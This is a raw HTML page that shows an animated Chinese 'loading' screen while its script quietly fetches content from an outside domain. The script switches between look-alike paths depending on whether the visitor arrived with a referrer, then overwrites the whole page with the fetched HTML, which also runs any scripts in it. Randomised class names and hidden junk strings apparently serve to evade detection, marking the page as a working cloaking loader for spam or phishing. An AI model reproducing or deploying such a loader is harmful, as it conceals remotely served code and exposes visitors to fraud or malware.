<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .aXFnDz0H {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .aXFnDz0H .PnZX5a {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .aXFnDz0H .content {
            line-height: 50px;
            text-align: center
        }

        .aXFnDz0H .img {
            width: 100%
        }

        .aXFnDz0H .LrXeOxUzy {
            text-align: center
        }

        .aXFnDz0H .LrXeOxUzy span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .aXFnDz0H .LrXeOxUzy span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .aXFnDz0H .LrXeOxUzy span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .aXFnDz0H .LrXeOxUzy span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .aXFnDz0H .LrXeOxUzy span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .aXFnDz0H .LrXeOxUzy span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .aXFnDz0H .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function iqJU8BSjCFv(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var RXPazA = iqJU8BSjCFv('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ RXPazA +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ RXPazA +".html?a=share";
		}
		
        CNJFyMy=url+"#"+new Date().getTime();
        CNJFyMy && function() {
            $.get(CNJFyMy, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>SHd8LgDKZkcm3Jsko7y9</span>
<img  src='' style='display:none'>
<span style='display:none'>SHd8LgDKZkcm3Jsko7y9</span><div class="aXFnDz0H">
    <div class="PnZX5a">
        <div class="LrXeOxUzy">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>ghDVBpqAR6NX7fuM71Z26ihLn17fMJYOIPNXpousSK9zUa7E8Nv6htQUHJ2</div>
<img  src='' style='display:none'>
<div style='display:none'>ghDVBpqAR6NX7fuM71Z26ihLn17fMJYOIPNXpousSK9zUa7E8Nv6htQUHJ2</div>
<ul style='display:none' >tKTKCt7VBKLyVn0HvCfOFRqlPt4eV8Q09dNOEVtPnrrGnYtjJx80QQFDdG4aIF3h9I51CX05ghaKMNEzFFcIxe75xG</ul>
<a  href='#' style='display:none'>d5n30CBhGAZjRT6Qcq43YwfrZ4lW1ZwYMET0b8bydQLqOETAOv0MSZThofkyumxbA</a></body>
</html>